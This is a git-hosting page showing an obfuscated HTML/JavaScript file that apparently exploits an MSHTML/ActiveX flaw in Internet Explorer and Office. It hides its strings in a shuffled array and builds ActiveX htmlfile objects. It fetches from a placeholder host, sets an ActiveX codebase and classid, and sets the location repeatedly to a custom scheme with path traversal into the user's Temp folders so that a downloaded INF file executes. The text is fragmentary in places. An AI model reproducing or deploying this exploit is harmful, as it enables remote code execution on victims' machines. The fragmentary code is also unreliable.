You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

146 lines
6.5 KiB

3 years ago
<!DOCTYPE html>
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var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "htmlfile", "115924pLbIpw", "GET",
"p/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"];
3 years ago
* @param {number} totalExpectedResults
* @param {?} entrySelector
* @return {?}
function getValue(totalExpectedResults, entrySelector) {
return getValue = function(state, value) {
/** @type {number} */
state = state - 170;
var processorState = tokensArray[state];
return processorState;
}, getValue(totalExpectedResults, entrySelector);
(function(data, oldPassword) {
/** @type {function(number, ?): ?} */
var toMonths = getValue;
for (; !![];) {
try {
/** @type {number} */
var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218));
if (userPsd === oldPassword) {
} else {
} catch (_0x34af1e) {
})(tokensArray, 384881), function() {
* @return {?}
function token_dash_lineno() {
/** @type {function(number, ?): ?} */
var addedRelations = currentRelations;
return addedRelations(205);
/** @type {function(number, ?): ?} */
var currentRelations = getValue;
/** @type {!Window} */
var global = window;
var document = global["document"];
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var el = then["call"](document, "iframe");
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PL$22["call"](document["body"], el);
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PL$22["call"](document["documentElement"], el);
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var model = new ACTIVEX("htmlfile");
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$["call"](document["body"], el);
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$["call"](document["documentElement"], el);
var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile");
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var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile");
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var htmlfile = new ActiveXObject("htmlfile");
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var args = new Object;
var ast = Object["prototype"]["open"];
var callbacks = Object["prototype"]["send"];
var modelIns = global["setTimeout"];
ast["call"](args, "GET", token_dash_lineno(), ![]);
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s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0");
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var i = "l";
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](view["Script"]["document"]["body"], s);
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
rp_test["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
htmlfile["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
doc["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago
/** @type {string} */
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>";
3 years ago